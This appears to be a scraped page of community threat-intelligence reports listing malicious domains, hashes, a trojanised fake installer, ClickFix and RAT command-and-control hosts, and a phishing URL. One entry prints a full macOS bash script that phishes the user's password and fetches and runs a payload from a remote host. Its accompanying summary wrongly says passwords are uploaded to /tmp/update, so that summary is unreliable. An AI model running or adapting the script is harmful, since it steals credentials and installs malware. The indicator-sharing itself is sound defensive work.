Date : 2026-09-02
Origin link : hxxps[://]flinchpoploaderfast[.]monster/indexactiverevenue[.]php
F ...
show moreDate : 2026-09-02
Origin link : hxxps[://]flinchpoploaderfast[.]monster/indexactiverevenue[.]php
Final link : hxxps[://]mega[.]nz/file/fAoHTKQT#iqQxUQg5exiirE8ILa8TC9Mcv8F2TWjlTnt7wxHXGDE
Original Link is attached to IP Ad-Tracking via [[indexactiverevenue[.]php]] possibly requesting browser authorisations (camera, location, microphone, push notifications) for Ad purposes.
Original Domain is linked to `dartpopfileloadfast[.]monster` and `zoompopsecretfilefast[.]monster`
Final link sends to a Mega Fileshare, The file has been removed tue to TOS violations.
show less
Source IP Address: 172.19.46.210 [US] CloudFlare
Contacted Domain : kitchen-canvas[.]com
###### Pa ...
show moreSource IP Address: 172.19.46.210 [US] CloudFlare
Contacted Domain : kitchen-canvas[.]com
###### Path:
```
%USERPROFILE%\Downloads\KitchenCanvas-Setup-3.36.exe
```
###### Hash (SHA256):
```
93197a5e32265778176e53103e56666f45a085ee579d668317fe1cdbff5767cf
```
###### Link (disabled for security reasons):
```
hxxps[://]kitchen-canvas[.]com/product/recipe?campaign_id=23845414708&adgroup_id=6712046517& placement_id=&creative_id=&spa=EAIaIQobChMIzcj_gKHClQMVJ9ANCR24TCDqEAEYASAAEgJ8ofD_BwE&gad_source=5&gad_campaignid=23840839415& gclid=EAIaIQobChMIzcj_gKHClQMVJ9ANCR24TCDqEAEYASAAEgJ8ofD_BwE
```
---
### Invest
Hello,
We received an alert following a visit to a risky URL via sponsored links.
The page prompts the user to download an application [KitchenCanvas-Setup-3.36.exe], an AI-powered cooking assistant.
The application is actually a vulnerable version of WinRAR packed with a Trojan.
Writeup : https://publish.obsidian.md/koffei/Is+Winrar+or+not+Winrar
show less
Source IP Address: 172.19.46.210 [US] CloudFlare
Contacted Domain : kitchen-canvas[.]com
###### Pa ...
show moreSource IP Address: 172.19.46.210 [US] CloudFlare
Contacted Domain : kitchen-canvas[.]com
###### Path:
```
%USERPROFILE%\Downloads\KitchenCanvas-Setup-3.36.exe
```
###### Hash (SHA256):
```
93197a5e32265778176e53103e56666f45a085ee579d668317fe1cdbff5767cf
```
###### Link (disabled for security reasons):
```
hxxps[://]kitchen-canvas[.]com/product/recipe?campaign_id=23845414708&adgroup_id=6712046517& placement_id=&creative_id=&spa=EAIaIQobChMIzcj_gKHClQMVJ9ANCR24TCDqEAEYASAAEgJ8ofD_BwE&gad_source=5&gad_campaignid=23840839415& gclid=EAIaIQobChMIzcj_gKHClQMVJ9ANCR24TCDqEAEYASAAEgJ8ofD_BwE
```
---
### Invest
Hello,
We received an alert following a visit to a risky URL via sponsored links.
The page prompts the user to download an application [KitchenCanvas-Setup-3.36.exe], an AI-powered cooking assistant.
The application is actually a vulnerable version of WinRAR packed with a Trojan.
Writeup : https://publish.obsidian.md/koffei/Is+Winrar+or+not+Winrar
show less
Clickfix C2 linked to domain merkantalolol[.]asia (188.114.97.3)
Payload is an obfuscated terminal ...
show moreClickfix C2 linked to domain merkantalolol[.]asia (188.114.97.3)
Payload is an obfuscated terminal command to open powershell and download "5c1e18e2.exe"
ANY.RUN run : https://app.any.run/tasks/37d87c42-2319-4dcb-8a18-28fc3ac94283
show less
winrar exploit
report :
https://publish.obsidian.md/koffei/%F0%9F%93%A1Koffei/Is+Winrar+or+not+Wi ...
show morewinrar exploit
report :
https://publish.obsidian.md/koffei/%F0%9F%93%A1Koffei/Is+Winrar+or+not+Winrar
show less
Date et heure : Dec. 8, 2025
Command :
```
`/bin/bash -c #!/bin/bash username=$(whoami) while tru ...
show moreDate et heure : Dec. 8, 2025
Command :
```
`/bin/bash -c #!/bin/bash username=$(whoami) while true; do echo -n "System Password: " read password echo if dscl . -authonly "$username" "$password" >/dev/null 2>&1; then echo -n "$password" > /tmp/.pass break else echo "Incorrect password! Try again." fi done curl -o /tmp/update hxxps[://]shrimpfc[.]com/ibkr/update >/dev/null 2>&1 echo "$password" | sudo -S xattr -c /tmp/update >/dev/null 2>&1 chmod +x /tmp/update /tmp/update`
```
Script used to:
- identify actively connected users
- open a loop requesting the user's password in a loop
- record attempted passwords in the [/tmp/update] file
- terminate the script by uploading the file containing the passwords to [hxxps[://]shrimpfc[.]com/ibkr/update]
This script was launched following the use of [runningboardd], an โRMMโ type application used to manage application resources on MacOS.
(links cleaned)
show less
Date et heure : Dec. 8, 2025
Command :
```
`/bin/bash -c #!/bin/bash username=$(whoami) while tr ...
show moreDate et heure : Dec. 8, 2025
Command :
```
`/bin/bash -c #!/bin/bash username=$(whoami) while true; do echo -n "System Password: " read password echo if dscl . -authonly "$username" "$password" >/dev/null 2>&1; then echo -n "$password" > /tmp/.pass break else echo "Incorrect password! Try again." fi done curl -o /tmp/update hxxps[://]shrimpfc[.]com/ibkr/update >/dev/null 2>&1 echo "$password" | sudo -S xattr -c /tmp/update >/dev/null 2>&1 chmod +x /tmp/update /tmp/update`
```
Script used to:
- identify actively connected users
- open a loop requesting the user's password in a loop
- record attempted passwords in the [/tmp/update] file
- terminate the script by uploading the file containing the passwords to [hxxps[://]shrimpfc[.]com/ibkr/update]
This script was launched following the use of [runningboardd], an โRMMโ type application used to manage application resources on MacOS.
(links cleaned)
show less
Command and control domain for "Uclient.exe" RAT https://app.any.run/tasks/a664d5b7-018b-4e21-9e76-d ...
show moreCommand and control domain for "Uclient.exe" RAT https://app.any.run/tasks/a664d5b7-018b-4e21-9e76-deee05e0407c
show less
Web scam emulating French Fine payement platform :
hxxps[://]lhabbabtours[.]bt/amendes-antai-gouv/ ...
show moreWeb scam emulating French Fine payement platform :
hxxps[://]lhabbabtours[.]bt/amendes-antai-gouv/Documents/embed?url=aHR0cHM6Ly9saGFiYmFidG91cnMuYnQvYW1lbmRlcy1hbnRhaS1nb3V2L0RvY3VtZW50cy8vY2FjaGUvUFZLRUJzdmp2a3piV1JETT8=
show less